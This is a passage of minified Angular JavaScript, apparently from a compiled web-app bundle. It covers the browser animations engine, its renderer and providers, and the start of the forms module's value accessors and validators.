a.transition.build(this.driver,a.element,a.fromState.value,a.toState.value,i,n,a.fromState.options,a.toState.options,e,r)}destroyInnerAnimations(a){let e=this.driver.query(a,m4,!0);e.forEach(i=>this.destroyActiveAnimationsForElement(i)),0!=this.playersByQueriedElement.size&&(e=this.driver.query(a,R6,!0),e.forEach(i=>this.finishActiveQueriedAnimationOnElement(i)))}destroyActiveAnimationsForElement(a){const e=this.playersByElement.get(a);e&&e.forEach(i=>{i.queued?i.markedForDestroy=!0:i.destroy()})}finishActiveQueriedAnimationOnElement(a){const e=this.playersByQueriedElement.get(a);e&&e.forEach(i=>i.finish())}whenRenderingDone(){return new Promise(a=>{if(this.players.length)return ep(this.players).onDone(()=>a());a()})}processLeaveNode(a){var e;const i=a[vd];if(i&&i.setForRemoval){if(a[vd]=TO,i.namespaceId){this.destroyInnerAnimations(a);const n=this._fetchNamespace(i.namespaceId);n&&n.clearElementCache(a)}this._onRemovalComplete(a,i.setForRemoval)}!(null===(e=a.classList)||void 0===e)&&e.contains(B6)&&this.markElementAsDisabled(a,!1),this.driver.query(a,".ng-animate-disabled",!0).forEach(n=>{this.markElementAsDisabled(n,!1)})}flush(a=-1){let e=[];if(this.newHostElements.size&&(this.newHostElements.forEach((i,n)=>this._balanceNamespaceList(i,n)),this.newHostElements.clear()),this.totalAnimations&&this.collectedEnterElements.length)for(let i=0;i<this.collectedEnterElements.length;i++)Ad(this.collectedEnterElements[i],"ng-star-inserted");if(this._namespaceList.length&&(this.totalQueuedPlayers||this.collectedLeaveElements.length)){const i=[];try{e=this._flushAnimations(i,a)}finally{for(let n=0;n<i.length;n++)i[n]()}}else for(let i=0;i<this.collectedLeaveElements.length;i++)this.processLeaveNode(this.collectedLeaveElements[i]);if(this.totalQueuedPlayers=0,this.collectedEnterElements.length=0,this.collectedLeaveElements.length=0,this._flushFns.forEach(i=>i()),this._flushFns=[],this._whenQuietFns.length){const i=this._whenQuietFns;this._whenQuietFns=[],e.length?ep(e).onDone(()=>{i.forEach(n=>n())}):i.forEach(n=>n())}}reportError(a){throw function Rce(t){return new gi(3402,!1)}()}_flushAnimations(a,e){const i=new y4,n=[],r=new Map,c=[],d=new Map,T=new Map,k=new Map,q=new Set;this.disabledNodes.forEach(Di=>{q.add(Di);const Pi=this.driver.query(Di,".ng-animate-queued",!0);for(let Oi=0;Oi<Pi.length;Oi++)q.add(Pi[Oi])});const Y=this.bodyNode,te=Array.from(this.statesByElement.keys()),pe=xO(te,this.collectedEnterElements),Re=new Map;let Fe=0;pe.forEach((Di,Pi)=>{const Oi=I6+Fe++;Re.set(Pi,Oi),Di.forEach($i=>Ad($i,Oi))});const Ne=[],et=new Set,ut=new Set;for(let Di=0;Di<this.collectedLeaveElements.length;Di++){const Pi=this.collectedLeaveElements[Di],Oi=Pi[vd];Oi&&Oi.setForRemoval&&(Ne.push(Pi),et.add(Pi),Oi.hasAnimation?this.driver.query(Pi,".ng-star-inserted",!0).forEach($i=>et.add($i)):ut.add(Pi))}const Ze=new Map,yt=xO(te,Array.from(et));yt.forEach((Di,Pi)=>{const Oi=l4+Fe++;Ze.set(Pi,Oi),Di.forEach($i=>Ad($i,Oi))}),a.push(()=>{pe.forEach((Di,Pi)=>{const Oi=Re.get(Pi);Di.forEach($i=>g1($i,Oi))}),yt.forEach((Di,Pi)=>{const Oi=Ze.get(Pi);Di.forEach($i=>g1($i,Oi))}),Ne.forEach(Di=>{this.processLeaveNode(Di)})});const It=[],St=[];for(let Di=this._namespaceList.length-1;Di>=0;Di--)this._namespaceList[Di].drainQueuedTransitions(e).forEach(Oi=>{const $i=Oi.player,Na=Oi.element;if(It.push($i),this.collectedEnterElements.length){const bn=Na[vd];if(bn&&bn.setForMove){if(bn.previousTriggersValues&&bn.previousTriggersValues.has(Oi.triggerName)){const Xr=bn.previousTriggersValues.get(Oi.triggerName),Li=this.statesByElement.get(Oi.element);if(Li&&Li.has(Oi.triggerName)){const Fa=Li.get(Oi.triggerName);Fa.value=Xr,Li.set(Oi.triggerName,Fa)}}return void $i.destroy()}}const jn=!Y||!this.driver.containsElement(Y,Na),yn=Ze.get(Na),Kr=Re.get(Na),to=this._buildInstruction(Oi,i,Kr,yn,jn);if(to.errors&&to.errors.length)return void St.push(to);if(jn)return $i.onStart(()=>rg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);if(Oi.isFallbackTransition)return $i.onStart(()=>rg(Na,to.fromStyles)),$i.onDestroy(()=>cu(Na,to.toStyles)),void n.push($i);const ol=[];to.timelines.forEach(bn=>{bn.stretchStartingKeyframe=!0,this.disabledNodes.has(bn.element)||ol.push(bn)}),to.timelines=ol,i.append(Na,to.timelines),c.push({instruction:to,player:$i,element:Na}),to.queriedElements.forEach(bn=>Gl(d,bn,[]).push($i)),to.preStyleProps.forEach((bn,Xr)=>{if(bn.size){let Li=T.get(Xr);Li||T.set(Xr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))}}),to.postStyleProps.forEach((bn,Xr)=>{let Li=k.get(Xr);Li||k.set(Xr,Li=new Set),bn.forEach((Fa,Fn)=>Li.add(Fn))})});if(St.length){const Di=[];St.forEach(Pi=>{Di.push(function Sce(t,a){return new gi(3505,!1)}())}),It.forEach(Pi=>Pi.destroy()),this.reportError(Di)}const Nt=new Map,oi=new Map;c.forEach(Di=>{const Pi=Di.element;i.has(Pi)&&(oi.set(Pi,Pi),this._beforeAnimationBuild(Di.player.namespaceId,Di.instruction,Nt))}),n.forEach(Di=>{const Pi=Di.element;this._getPreviousPlayers(Pi,!1,Di.namespaceId,Di.triggerName,null).forEach($i=>{Gl(Nt,Pi,[]).push($i),$i.destroy()})});const Ai=Ne.filter(Di=>IO(Di,T,k)),vi=new Map;DO(vi,this.driver,ut,k,wh).forEach(Di=>{IO(Di,T,k)&&Ai.push(Di)});const Za=new Map;pe.forEach((Di,Pi)=>{DO(Za,this.driver,new Set(Di),T,"!")}),Ai.forEach(Di=>{var Pi,Oi;const $i=vi.get(Di),Na=Za.get(Di);vi.set(Di,new Map([...Array.from(null!==(Pi=null==$i?void 0:$i.entries())&&void 0!==Pi?Pi:[]),...Array.from(null!==(Oi=null==Na?void 0:Na.entries())&&void 0!==Oi?Oi:[])]))});const wa=[],en=[],Vo={};c.forEach(Di=>{const{element:Pi,player:Oi,instruction:$i}=Di;if(i.has(Pi)){if(q.has(Pi))return Oi.onDestroy(()=>cu(Pi,$i.toStyles)),Oi.disabled=!0,Oi.overrideTotalTime($i.totalTime),void n.push(Oi);let Na=Vo;if(oi.size>1){let yn=Pi;const Kr=[];for(;yn=yn.parentNode;){const to=oi.get(yn);if(to){Na=to;break}Kr.push(yn)}Kr.forEach(to=>oi.set(to,Na))}const jn=this._buildAnimation(Oi.namespaceId,$i,Nt,r,Za,vi);if(Oi.setRealPlayer(jn),Na===Vo)wa.push(Oi);else{const yn=this.playersByElement.get(Na);yn&&yn.length&&(Oi.parentPlayer=ep(yn)),n.push(Oi)}}else rg(Pi,$i.fromStyles),Oi.onDestroy(()=>cu(Pi,$i.toStyles)),en.push(Oi),q.has(Pi)&&n.push(Oi)}),en.forEach(Di=>{const Pi=r.get(Di.element);if(Pi&&Pi.length){const Oi=ep(Pi);Di.setRealPlayer(Oi)}}),n.forEach(Di=>{Di.parentPlayer?Di.syncPlayerEvents(Di.parentPlayer):Di.destroy()});for(let Di=0;Di<Ne.length;Di++){const Pi=Ne[Di],Oi=Pi[vd];if(g1(Pi,l4),Oi&&Oi.hasAnimation)continue;let $i=[];if(d.size){let jn=d.get(Pi);jn&&jn.length&&$i.push(...jn);let yn=this.driver.query(Pi,R6,!0);for(let Kr=0;Kr<yn.length;Kr++){let to=d.get(yn[Kr]);to&&to.length&&$i.push(...to)}}const Na=$i.filter(jn=>!jn.destroyed);Na.length?Ole(this,Pi,Na):this.processLeaveNode(Pi)}return Ne.length=0,wa.forEach(Di=>{this.players.push(Di),Di.onDone(()=>{Di.destroy();const Pi=this.players.indexOf(Di);this.players.splice(Pi,1)}),Di.play()}),wa}elementContainsData(a,e){let i=!1;const n=e[vd];return n&&n.setForRemoval&&(i=!0),this.playersByElement.has(e)&&(i=!0),this.playersByQueriedElement.has(e)&&(i=!0),this.statesByElement.has(e)&&(i=!0),this._fetchNamespace(a).elementContainsData(e)||i}afterFlush(a){this._flushFns.push(a)}afterFlushAnimationsDone(a){this._whenQuietFns.push(a)}_getPreviousPlayers(a,e,i,n,r){let c=[];if(e){const d=this.playersByQueriedElement.get(a);d&&(c=d)}else{const d=this.playersByElement.get(a);if(d){const T=!r||r==hy;d.forEach(k=>{k.queued||!T&&k.triggerName!=n||c.push(k)})}}return(i||n)&&(c=c.filter(d=>!(i&&i!=d.namespaceId||n&&n!=d.triggerName))),c}_beforeAnimationBuild(a,e,i){const r=e.element,c=e.isRemovalTransition?void 0:a,d=e.isRemovalTransition?void 0:e.triggerName;for(const T of e.timelines){const k=T.element,q=k!==r,Y=Gl(i,k,[]);this._getPreviousPlayers(k,q,c,d,e.toState).forEach(pe=>{const Re=pe.getRealPlayer();Re.beforeDestroy&&Re.beforeDestroy(),pe.destroy(),Y.push(pe)})}rg(r,e.fromStyles)}_buildAnimation(a,e,i,n,r,c){const d=e.triggerName,T=e.element,k=[],q=new Set,Y=new Set,te=e.timelines.map(Re=>{const Fe=Re.element;q.add(Fe);const Ne=Fe[vd];if(Ne&&Ne.removedBeforeQueried)return new ly(Re.duration,Re.delay);const et=Fe!==T,ut=function Nle(t){const a=[];return wO(t,a),a}((i.get(Fe)||xle).map(Nt=>Nt.getRealPlayer())).filter(Nt=>!!Nt.element&&Nt.element===Fe),Ze=r.get(Fe),yt=c.get(Fe),It=eO(0,this._normalizer,0,Re.keyframes,Ze,yt),St=this._buildPlayer(Re,It,ut);if(Re.subTimeline&&n&&Y.add(Fe),et){const Nt=new q6(a,d,Fe);Nt.setRealPlayer(St),k.push(Nt)}return St});k.forEach(Re=>{Gl(this.playersByQueriedElement,Re.element,[]).push(Re),Re.onDone(()=>function Sle(t,a,e){let i=t.get(a);if(i){if(i.length){const n=i.indexOf(e);i.splice(n,1)}0==i.length&&t.delete(a)}return i}(this.playersByQueriedElement,Re.element,Re))}),q.forEach(Re=>Ad(Re,lO));const pe=ep(te);return pe.onDestroy(()=>{q.forEach(Re=>g1(Re,lO)),cu(T,e.toStyles)}),Y.forEach(Re=>{Gl(n,Re,[]).push(pe)}),pe}_buildPlayer(a,e,i){return e.length>0?this.driver.animate(a.element,e,a.duration,a.delay,a.easing,i):new ly(a.duration,a.delay)}}class q6{constructor(a,e,i){this.namespaceId=a,this.triggerName=e,this.element=i,this._player=new ly,this._containsRealPlayer=!1,this._queuedCallbacks=new Map,this.destroyed=!1,this.markedForDestroy=!1,this.disabled=!1,this.queued=!0,this.totalTime=0}setRealPlayer(a){this._containsRealPlayer||(this._player=a,this._queuedCallbacks.forEach((e,i)=>{e.forEach(n=>A6(a,i,void 0,n))}),this._queuedCallbacks.clear(),this._containsRealPlayer=!0,this.overrideTotalTime(a.totalTime),this.queued=!1)}getRealPlayer(){return this._player}overrideTotalTime(a){this.totalTime=a}syncPlayerEvents(a){const e=this._player;e.triggerCallback&&a.onStart(()=>e.triggerCallback("start")),a.onDone(()=>this.finish()),a.onDestroy(()=>this.destroy())}_queueEvent(a,e){Gl(this._queuedCallbacks,a,[]).push(e)}onDone(a){this.queued&&this._queueEvent("done",a),this._player.onDone(a)}onStart(a){this.queued&&this._queueEvent("start",a),this._player.onStart(a)}onDestroy(a){this.queued&&this._queueEvent("destroy",a),this._player.onDestroy(a)}init(){this._player.init()}hasStarted(){return!this.queued&&this._player.hasStarted()}play(){!this.queued&&this._player.play()}pause(){!this.queued&&this._player.pause()}restart(){!this.queued&&this._player.restart()}finish(){this._player.finish()}destroy(){this.destroyed=!0,this._player.destroy()}reset(){!this.queued&&this._player.reset()}setPosition(a){this.queued||this._player.setPosition(a)}getPosition(){return this.queued?0:this._player.getPosition()}triggerCallback(a){const e=this._player;e.triggerCallback&&e.triggerCallback(a)}}function v4(t){return t&&1===t.nodeType}function EO(t,a){const e=t.style.display;return t.style.display=null!=a?a:"none",e}function DO(t,a,e,i,n){const r=[];e.forEach(T=>r.push(EO(T)));const c=[];i.forEach((T,k)=>{const q=new Map;T.forEach(Y=>{const te=a.computeStyle(k,Y,n);q.set(Y,te),(!te||0==te.length)&&(k[vd]=wle,c.push(k))}),t.set(k,q)});let d=0;return e.forEach(T=>EO(T,r[d++])),c}function xO(t,a){const e=new Map;if(t.forEach(d=>e.set(d,[])),0==a.length)return e;const n=new Set(a),r=new Map;function c(d){if(!d)return 1;let T=r.get(d);if(T)return T;const k=d.parentNode;return T=e.has(k)?k:n.has(k)?1:c(k),r.set(d,T),T}return a.forEach(d=>{const T=c(d);1!==T&&e.get(T).push(d)}),e}function Ad(t,a){var e;null===(e=t.classList)||void 0===e||e.add(a)}function g1(t,a){var e;null===(e=t.classList)||void 0===e||e.remove(a)}function Ole(t,a,e){ep(e).onDone(()=>t.processLeaveNode(a))}function wO(t,a){for(let e=0;e<t.length;e++){const i=t[e];i instanceof YP?wO(i.players,a):a.push(i)}}function IO(t,a,e){const i=e.get(t);if(!i)return!1;let n=a.get(t);return n?i.forEach(r=>n.add(r)):a.set(t,i),e.delete(t),!0}class A4{constructor(a,e,i){this.bodyNode=a,this._driver=e,this._normalizer=i,this._triggerCache={},this.onRemovalComplete=(n,r)=>{},this._transitionEngine=new Rle(a,e,i),this._timelineEngine=new vle(a,e,i),this._transitionEngine.onRemovalComplete=(n,r)=>this.onRemovalComplete(n,r)}registerTrigger(a,e,i,n,r){const c=a+"-"+n;let d=this._triggerCache[c];if(!d){const T=[],q=O6(this._driver,r,T,[]);if(T.length)throw function bce(t,a){return new gi(3404,!1)}();d=function Cle(t,a,e){return new yle(t,a,e)}(n,q,this._normalizer),this._triggerCache[c]=d}this._transitionEngine.registerTrigger(e,n,d)}register(a,e){this._transitionEngine.register(a,e)}destroy(a,e){this._transitionEngine.destroy(a,e)}onInsert(a,e,i,n){this._transitionEngine.insertNode(a,e,i,n)}onRemove(a,e,i,n){this._transitionEngine.removeNode(a,e,n||!1,i)}disableAnimations(a,e){this._transitionEngine.markElementAsDisabled(a,e)}process(a,e,i,n){if("@"==i.charAt(0)){const[r,c]=tO(i);this._timelineEngine.command(r,e,c,n)}else this._transitionEngine.trigger(a,e,i,n)}listen(a,e,i,n,r){if("@"==i.charAt(0)){const[c,d]=tO(i);return this._timelineEngine.listen(c,e,d,r)}return this._transitionEngine.listen(a,e,i,n,r)}flush(a=-1){this._transitionEngine.flush(a)}get players(){return this._transitionEngine.players.concat(this._timelineEngine.players)}whenRenderingDone(){return this._transitionEngine.whenRenderingDone()}}let Wle=(()=>{class t{constructor(e,i,n){this._element=e,this._startStyles=i,this._endStyles=n,this._state=0;let r=t.initialStylesByElement.get(e);r||t.initialStylesByElement.set(e,r=new Map),this._initialStyles=r}start(){this._state<1&&(this._startStyles&&cu(this._element,this._startStyles,this._initialStyles),this._state=1)}finish(){this.start(),this._state<2&&(cu(this._element,this._initialStyles),this._endStyles&&(cu(this._element,this._endStyles),this._endStyles=null),this._state=1)}destroy(){this.finish(),this._state<3&&(t.initialStylesByElement.delete(this._element),this._startStyles&&(rg(this._element,this._startStyles),this._endStyles=null),this._endStyles&&(rg(this._element,this._endStyles),this._endStyles=null),cu(this._element,this._initialStyles),this._state=3)}}return t.initialStylesByElement=new WeakMap,t})();function G6(t){let a=null;return t.forEach((e,i)=>{(function Fle(t){return"display"===t||"position"===t})(i)&&(a=a||new Map,a.set(i,e))}),a}class RO{constructor(a,e,i,n){this.element=a,this.keyframes=e,this.options=i,this._specialStyles=n,this._onDoneFns=[],this._onStartFns=[],this._onDestroyFns=[],this._initialized=!1,this._finished=!1,this._started=!1,this._destroyed=!1,this._originalOnDoneFns=[],this._originalOnStartFns=[],this.time=0,this.parentPlayer=null,this.currentSnapshot=new Map,this._duration=i.duration,this._delay=i.delay||0,this.time=this._duration+this._delay}_onFinish(){this._finished||(this._finished=!0,this._onDoneFns.forEach(a=>a()),this._onDoneFns=[])}init(){this._buildPlayer(),this._preparePlayerBeforeStart()}_buildPlayer(){if(this._initialized)return;this._initialized=!0;const a=this.keyframes;this.domPlayer=this._triggerWebAnimation(this.element,a,this.options),this._finalKeyframe=a.length?a[a.length-1]:new Map,this.domPlayer.addEventListener("finish",()=>this._onFinish())}_preparePlayerBeforeStart(){this._delay?this._resetDomPlayerState():this.domPlayer.pause()}_convertKeyframesToObject(a){const e=[];return a.forEach(i=>{e.push(Object.fromEntries(i))}),e}_triggerWebAnimation(a,e,i){return a.animate(this._convertKeyframesToObject(e),i)}onStart(a){this._originalOnStartFns.push(a),this._onStartFns.push(a)}onDone(a){this._originalOnDoneFns.push(a),this._onDoneFns.push(a)}onDestroy(a){this._onDestroyFns.push(a)}play(){this._buildPlayer(),this.hasStarted()||(this._onStartFns.forEach(a=>a()),this._onStartFns=[],this._started=!0,this._specialStyles&&this._specialStyles.start()),this.domPlayer.play()}pause(){this.init(),this.domPlayer.pause()}finish(){this.init(),this._specialStyles&&this._specialStyles.finish(),this._onFinish(),this.domPlayer.finish()}reset(){this._resetDomPlayerState(),this._destroyed=!1,this._finished=!1,this._started=!1,this._onStartFns=this._originalOnStartFns,this._onDoneFns=this._originalOnDoneFns}_resetDomPlayerState(){this.domPlayer&&this.domPlayer.cancel()}restart(){this.reset(),this.play()}hasStarted(){return this._started}destroy(){this._destroyed||(this._destroyed=!0,this._resetDomPlayerState(),this._onFinish(),this._specialStyles&&this._specialStyles.destroy(),this._onDestroyFns.forEach(a=>a()),this._onDestroyFns=[])}setPosition(a){void 0===this.domPlayer&&this.init(),this.domPlayer.currentTime=a*this.time}getPosition(){return this.domPlayer.currentTime/this.time}get totalTime(){return this._delay+this._duration}beforeDestroy(){const a=new Map;this.hasStarted()&&this._finalKeyframe.forEach((i,n)=>{"offset"!==n&&a.set(n,this._finished?i:pO(this.element,n))}),this.currentSnapshot=a}triggerCallback(a){const e="start"===a?this._onStartFns:this._onDoneFns;e.forEach(i=>i()),e.length=0}}class Vle{validateStyleProperty(a){return!0}validateAnimatableStyleProperty(a){return!0}matchesElement(a,e){return!1}containsElement(a,e){return oO(a,e)}getParentElement(a){return x6(a)}query(a,e,i){return rO(a,e,i)}computeStyle(a,e,i){return window.getComputedStyle(a)[e]}animate(a,e,i,n,r,c=[]){const T={duration:i,delay:n,fill:0==n?"both":"forwards"};r&&(T.easing=r);const k=new Map,q=c.filter(pe=>pe instanceof RO);(function qce(t,a){return 0===t||0===a})(i,n)&&q.forEach(pe=>{pe.currentSnapshot.forEach((Re,Fe)=>k.set(Fe,Re))});let Y=function Vce(t){return t.length?t[0]instanceof Map?t:t.map(a=>dO(a)):[]}(e).map(pe=>tp(pe));Y=function Gce(t,a,e){if(e.size&&a.length){let i=a[0],n=[];if(e.forEach((r,c)=>{i.has(c)||n.push(c),i.set(c,r)}),n.length)for(let r=1;r<a.length;r++){let c=a[r];n.forEach(d=>c.set(d,pO(t,d)))}}return a}(a,Y,k);const te=function zle(t,a){let e=null,i=null;return Array.isArray(a)&&a.length?(e=G6(a[0]),a.length>1&&(i=G6(a[a.length-1]))):a instanceof Map&&(e=G6(a)),e||i?new Wle(t,e,i):null}(a,Y);return new RO(a,Y,T,te)}}let Ble=(()=>{class t extends QP{constructor(e,i){super(),this._nextAnimationId=0,this._renderer=e.createRenderer(i.body,{id:"0",encapsulation:dc.None,styles:[],data:{animation:[]}})}build(e){const i=this._nextAnimationId.toString();this._nextAnimationId++;const n=Array.isArray(e)?KP(e):e;return SO(this._renderer,null,i,"register",[n]),new Hle(i,this._renderer)}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(ga))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class Hle extends class Jse{}{constructor(a,e){super(),this._id=a,this._renderer=e}create(a,e){return new Ule(this._id,a,e||{},this._renderer)}}class Ule{constructor(a,e,i,n){this.id=a,this.element=e,this._renderer=n,this.parentPlayer=null,this._started=!1,this.totalTime=0,this._command("create",i)}_listen(a,e){return this._renderer.listen(this.element,`@@${this.id}:${a}`,e)}_command(a,...e){return SO(this._renderer,this.element,this.id,a,e)}onDone(a){this._listen("done",a)}onStart(a){this._listen("start",a)}onDestroy(a){this._listen("destroy",a)}init(){this._command("init")}hasStarted(){return this._started}play(){this._command("play"),this._started=!0}pause(){this._command("pause")}restart(){this._command("restart")}finish(){this._command("finish")}destroy(){this._command("destroy")}reset(){this._command("reset"),this._started=!1}setPosition(a){this._command("setPosition",a)}getPosition(){var a,e;return null!==(e=null===(a=this._renderer.engine.players[+this.id])||void 0===a?void 0:a.getPosition())&&void 0!==e?e:0}}function SO(t,a,e,i,n){return t.setProperty(a,`@@${e}:${i}`,n)}const kO="@.disabled";let qle=(()=>{class t{constructor(e,i,n){this.delegate=e,this.engine=i,this._zone=n,this._currentId=0,this._microtaskId=1,this._animationCallbacksBuffer=[],this._rendererCache=new Map,this._cdRecurDepth=0,this.promise=Promise.resolve(0),i.onRemovalComplete=(r,c)=>{const d=null==c?void 0:c.parentNode(r);d&&c.removeChild(d,r)}}createRenderer(e,i){const r=this.delegate.createRenderer(e,i);if(!(e&&i&&i.data&&i.data.animation)){let q=this._rendererCache.get(r);return q||(q=new PO("",r,this.engine),this._rendererCache.set(r,q)),q}const c=i.id,d=i.id+"-"+this._currentId;this._currentId++,this.engine.register(d,e);const T=q=>{Array.isArray(q)?q.forEach(T):this.engine.registerTrigger(c,d,e,q.name,q)};return i.data.animation.forEach(T),new Gle(this,d,r,this.engine)}begin(){this._cdRecurDepth++,this.delegate.begin&&this.delegate.begin()}_scheduleCountTask(){this.promise.then(()=>{this._microtaskId++})}scheduleListenerCallback(e,i,n){e>=0&&e<this._microtaskId?this._zone.run(()=>i(n)):(0==this._animationCallbacksBuffer.length&&Promise.resolve(null).then(()=>{this._zone.run(()=>{this._animationCallbacksBuffer.forEach(r=>{const[c,d]=r;c(d)}),this._animationCallbacksBuffer=[]})}),this._animationCallbacksBuffer.push([i,n]))}end(){this._cdRecurDepth--,0==this._cdRecurDepth&&this._zone.runOutsideAngular(()=>{this._scheduleCountTask(),this.engine.flush(this._microtaskId)}),this.delegate.end&&this.delegate.end()}whenRenderingDone(){return this.engine.whenRenderingDone()}}return t.\u0275fac=function(e){return new(e||t)(At(qs),At(A4),At(qi))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})();class PO{constructor(a,e,i){this.namespaceId=a,this.delegate=e,this.engine=i,this.destroyNode=this.delegate.destroyNode?n=>e.destroyNode(n):null}get data(){return this.delegate.data}destroy(){this.engine.destroy(this.namespaceId,this.delegate),this.delegate.destroy()}createElement(a,e){return this.delegate.createElement(a,e)}createComment(a){return this.delegate.createComment(a)}createText(a){return this.delegate.createText(a)}appendChild(a,e){this.delegate.appendChild(a,e),this.engine.onInsert(this.namespaceId,e,a,!1)}insertBefore(a,e,i,n=!0){this.delegate.insertBefore(a,e,i),this.engine.onInsert(this.namespaceId,e,a,n)}removeChild(a,e,i){this.engine.onRemove(this.namespaceId,e,this.delegate,i)}selectRootElement(a,e){return this.delegate.selectRootElement(a,e)}parentNode(a){return this.delegate.parentNode(a)}nextSibling(a){return this.delegate.nextSibling(a)}setAttribute(a,e,i,n){this.delegate.setAttribute(a,e,i,n)}removeAttribute(a,e,i){this.delegate.removeAttribute(a,e,i)}addClass(a,e){this.delegate.addClass(a,e)}removeClass(a,e){this.delegate.removeClass(a,e)}setStyle(a,e,i,n){this.delegate.setStyle(a,e,i,n)}removeStyle(a,e,i){this.delegate.removeStyle(a,e,i)}setProperty(a,e,i){"@"==e.charAt(0)&&e==kO?this.disableAnimations(a,!!i):this.delegate.setProperty(a,e,i)}setValue(a,e){this.delegate.setValue(a,e)}listen(a,e,i){return this.delegate.listen(a,e,i)}disableAnimations(a,e){this.engine.disableAnimations(a,e)}}class Gle extends PO{constructor(a,e,i,n){super(e,i,n),this.factory=a,this.namespaceId=e}setProperty(a,e,i){"@"==e.charAt(0)?"."==e.charAt(1)&&e==kO?this.disableAnimations(a,i=void 0===i||!!i):this.engine.process(this.namespaceId,a,e.slice(1),i):this.delegate.setProperty(a,e,i)}listen(a,e,i){if("@"==e.charAt(0)){const n=function jle(t){switch(t){case"body":return document.body;case"document":return document;case"window":return window;default:return t}}(a);let r=e.slice(1),c="";return"@"!=r.charAt(0)&&([r,c]=function Qle(t){const a=t.indexOf(".");return[t.substring(0,a),t.slice(a+1)]}(r)),this.engine.listen(this.namespaceId,n,r,c,d=>{this.factory.scheduleListenerCallback(d._data||-1,i,d)})}return this.delegate.listen(a,e,i)}}const OO=[{provide:QP,useClass:Ble},{provide:F6,useFactory:function Kle(){return new fle}},{provide:A4,useClass:(()=>{class t extends A4{constructor(e,i,n,r){super(e.body,i,n)}ngOnDestroy(){this.flush()}}return t.\u0275fac=function(e){return new(e||t)(At(ga),At(w6),At(F6),At(Yf))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})()},{provide:qs,useFactory:function Xle(t,a,e){return new qle(t,a,e)},deps:[r4,A4,qi]}],j6=[{provide:w6,useFactory:()=>new Vle},{provide:ar,useValue:"BrowserAnimations"},...OO],NO=[{provide:w6,useClass:sO},{provide:ar,useValue:"NoopAnimations"},...OO];let Yle=(()=>{class t{static withConfig(e){return{ngModule:t,providers:e.disableAnimations?NO:j6}}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({providers:j6,imports:[HP]}),t})();const{isArray:Jle}=Array,{getPrototypeOf:Zle,prototype:ede,keys:tde}=Object;function LO(t){if(1===t.length){const a=t[0];if(Jle(a))return{args:a,keys:null};if(function ide(t){return t&&"object"==typeof t&&Zle(t)===ede}(a)){const e=tde(a);return{args:e.map(i=>a[i]),keys:e}}}return{args:t,keys:null}}const{isArray:ade}=Array;function Q6(t){return Xe(a=>function nde(t,a){return ade(a)?t(...a):t(a)}(t,a))}function zO(t,a){return t.reduce((e,i,n)=>(e[i]=a[n],e),{})}function $6(...t){const a=yo(t),{args:e,keys:i}=LO(t),n=new G(r=>{const{length:c}=e;if(!c)return void r.complete();const d=new Array(c);let T=c,k=c;for(let q=0;q<c;q++){let Y=!1;pn(e[q]).subscribe(Ae(r,te=>{Y||(Y=!0,k--),d[q]=te},()=>T--,void 0,()=>{(!T||!Y)&&(k||r.next(i?zO(i,d):d),r.complete())}))}});return a?n.pipe(Q6(a)):n}let WO=(()=>{class t{constructor(e,i){this._renderer=e,this._elementRef=i,this.onChange=n=>{},this.onTouched=()=>{}}setProperty(e,i){this._renderer.setProperty(this._elementRef.nativeElement,e,i)}registerOnTouched(e){this.onTouched=e}registerOnChange(e){this.onChange=e}setDisabledState(e){this.setProperty("disabled",e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi))},t.\u0275dir=Ot({type:t}),t})(),cg=(()=>{class t extends WO{}return t.\u0275fac=function(){let a;return function(i){return(a||(a=ba(t)))(i||t)}}(),t.\u0275dir=Ot({type:t,features:[ci]}),t})();const Ls=new ni("NgValueAccessor"),rde={provide:Ls,useExisting:ja(()=>an),multi:!0},cde=new ni("CompositionEventMode");let an=(()=>{class t extends WO{constructor(e,i,n){super(e,i),this._compositionMode=n,this._composing=!1,null==this._compositionMode&&(this._compositionMode=!function sde(){const t=su()?su().getUserAgent():"";return/android (\d+)/.test(t.toLowerCase())}())}writeValue(e){this.setProperty("value",null==e?"":e)}_handleInput(e){(!this._compositionMode||this._compositionMode&&!this._composing)&&this.onChange(e)}_compositionStart(){this._composing=!0}_compositionEnd(e){this._composing=!1,this._compositionMode&&this.onChange(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(wr),Ee(mi),Ee(cde,8))},t.\u0275dir=Ot({type:t,selectors:[["input","formControlName","",3,"type","checkbox"],["textarea","formControlName",""],["input","formControl","",3,"type","checkbox"],["textarea","formControl",""],["input","ngModel","",3,"type","checkbox"],["textarea","ngModel",""],["","ngDefaultControl",""]],hostBindings:function(e,i){1&e&&he("input",function(r){return i._handleInput(r.target.value)})("blur",function(){return i.onTouched()})("compositionstart",function(){return i._compositionStart()})("compositionend",function(r){return i._compositionEnd(r.target.value)})},features:[ki([rde]),ci]}),t})();function ip(t){return null==t||("string"==typeof t||Array.isArray(t))&&0===t.length}function VO(t){return null!=t&&"number"==typeof t.length}const ys=new ni("NgValidators"),ap=new ni("NgAsyncValidators"),dde=/^(?=.{1,254}$)(?=.{1,64}@)[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-zA-Z0-9!#$%&'*+/=?^_`{|}~-]+)*@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/;class Td{static min(a){return BO(a)}static max(a){return HO(a)}static required(a){return UO(a)}static requiredTrue(a){return function qO(t){return!0===t.value?null:{required:!0}}(a)}static email(a){return function GO(t){return ip(t.value)||dde.test(t.value)?null:{email:!0}}(a)}static minLength(a){return function jO(t){return a=>ip(a.value)||!VO(a.value)?null:a.value.length<t?{minlength:{requiredLength:t,actualLength:a.value.length}}:null}(a)}static maxLength(a){return function QO(t){return a=>VO(a.value)&&a.value.length>t?{maxlength:{requiredLength:t,actualLength:a.value.length}}:null}(a)}static pattern(a){return function $O(t){if(!t)return E4;let a,e;return"string"==typeof t?(e="","^"!==t.charAt(0)&&(e+="^"),e+=t,"$"!==t.charAt(t.length-1)&&(e+="$"),a=new RegExp(e)):(e=t.toString(),a=t),i=>{if(ip(i.value))return null;const n=i.value;return 